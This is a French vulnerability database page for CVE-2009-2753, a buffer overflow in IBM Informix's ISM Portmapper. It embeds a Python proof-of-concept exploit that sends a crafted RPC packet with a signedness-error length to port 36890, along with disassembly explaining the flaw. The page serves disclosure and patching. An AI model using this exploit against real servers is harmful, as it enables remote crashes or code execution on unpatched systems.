CVE-2009-2753 : Détail

CVE-2009-2753

Overflow
66.8%V3
Network
2010-03-05
15h00 +00:00
2018-10-10
16h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple buffer overflows in the authentication functionality in librpc.dll in the Informix Storage Manager (ISM) Portmapper service (aka portmap.exe), as used in IBM Informix Dynamic Server (IDS) 10.x before 10.00.TC9 and 11.x before 11.10.TC3, allow remote attackers to execute arbitrary code via a crafted parameter size.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 12109

Date de publication : 2010-04-07 22h00 +00:00
Auteur : ZSploit.com
EDB Vérifié : Yes

# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability # Date: 2010-04-08 # Author: ZSploit.com # Software Link: N/A # Version: N/A # Tested on: IBM Informix Dynamic Server 10.0 # CVE : CVE-2009-2754 #! /usr/bin/env python ############################################################################### ## File : zs_ids_rpc.py ## Description: ## : ## Created_On : Mar 21 2010 ## ## (c) Copyright 2010, ZSploit.com. all rights reserved. ############################################################################### """ The issue in __lgto_svcauth_unix(): .text:1000B8E1 mov [ebp+0], eax .text:1000B8E4 mov eax, [ebx] .text:1000B8E6 push eax ; netlong .text:1000B8E7 add ebx, 4 .text:1000B8EA call esi ; ntohl ; Get length of hostname .text:1000B8EC cmp eax, 0FFh ; Signedness error, if we give 0xffffffff(-1) will pass this check .text:1000B8F1 jle short loc_1000B8FD .text:1000B8F3 mov esi, 1 .text:1000B8F8 jmp loc_1000B9D5 .text:1000B8FD ; --------------------------------------------------------------------------- .text:1000B8FD .text:1000B8FD loc_1000B8FD: ; CODE XREF: __lgto_svcauth_unix+71j .text:1000B8FD mov edi, [ebp+4] .text:1000B900 mov ecx, eax .text:1000B902 mov edx, ecx .text:1000B904 mov esi, ebx .text:1000B906 shr ecx, 2 .text:1000B909 rep movsd ; call memcpy here with user-supplied size cause a stack overflow .text:1000B90B mov ecx, edx .text:1000B90D add eax, 3 .text:1000B910 and ecx, 3 .text:1000B913 rep movsb """ import sys import socket if (len(sys.argv) != 2): print "Usage:\t%s [target]" % sys.argv[0] sys.exit(0) data = "\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" \ "\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" \ "\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41" \ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42" \ "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \ "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \ "\x00\x00\x00\x00\x00\x00\x00\x00" host = sys.argv[1] port = 36890 print "PoC for ZDI-10-023 by ZSploit.com" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((host, port)) s.send(data) print "Sending payload .." except: print "Error in send" print "Done" except: print "Error in socket" The ZSploit Team http://zsploit.com

Products Mentioned

Configuraton 0

Ibm>>Informix_dynamic_server >> Version 10.0

Ibm>>Informix_dynamic_server >> Version 10.0.tc1

Ibm>>Informix_dynamic_server >> Version 10.0.xc1

Ibm>>Informix_dynamic_server >> Version 10.0.xc2e

    Ibm>>Informix_dynamic_server >> Version 10.0.xc3

    Ibm>>Informix_dynamic_server >> Version 10.0.xc3e

      Ibm>>Informix_dynamic_server >> Version 10.0.xc4

        Ibm>>Informix_dynamic_server >> Version 10.0.xc4e

          Ibm>>Informix_dynamic_server >> Version 10.0.xc5

            Ibm>>Informix_dynamic_server >> Version 10.0.xc5e

              Ibm>>Informix_dynamic_server >> Version 10.0.xc6

                Ibm>>Informix_dynamic_server >> Version 10.0.xc6e

                  Ibm>>Informix_dynamic_server >> Version 10.0.xc7

                    Ibm>>Informix_dynamic_server >> Version 10.0.xc7e

                      Ibm>>Informix_dynamic_server >> Version 10.0.xc8

                        Ibm>>Informix_dynamic_server >> Version 10.0.xc8e

                          Ibm>>Informix_dynamic_server >> Version 10.0.xc9

                            Ibm>>Informix_dynamic_server >> Version 10.0.xc9e

                              Ibm>>Informix_dynamic_server >> Version 10.0.xc10

                                Ibm>>Informix_dynamic_server >> Version 10.0.xc10e

                                  Ibm>>Informix_dynamic_server >> Version 11.1

                                    Ibm>>Informix_dynamic_server >> Version 11.10

                                    Ibm>>Informix_dynamic_server >> Version 11.10.xc1

                                    Ibm>>Informix_dynamic_server >> Version 11.10.xc1de

                                      Ibm>>Informix_dynamic_server >> Version 11.10.xc2

                                      Ibm>>Informix_dynamic_server >> Version 11.10.xc2e

                                        Ibm>>Informix_dynamic_server >> Version 11.10.xc3

                                        Ibm>>Informix_dynamic_server >> Version 11.10.xc3e

                                          Références

                                          http://secunia.com/advisories/38731
                                          Tags : third-party-advisory, x_refsource_SECUNIA
                                          http://www.vupen.com/english/advisories/2010/0508
                                          Tags : vdb-entry, x_refsource_VUPEN
                                          http://www.ibm.com/support/docview.wss?uid=swg1IC55329
                                          Tags : vendor-advisory, x_refsource_AIXAPAR
                                          http://www.ibm.com/support/docview.wss?uid=swg1IC55330
                                          Tags : vendor-advisory, x_refsource_AIXAPAR
                                          http://securitytracker.com/id?1023669
                                          Tags : vdb-entry, x_refsource_SECTRACK
                                          http://www.securityfocus.com/bid/38471
                                          Tags : vdb-entry, x_refsource_BID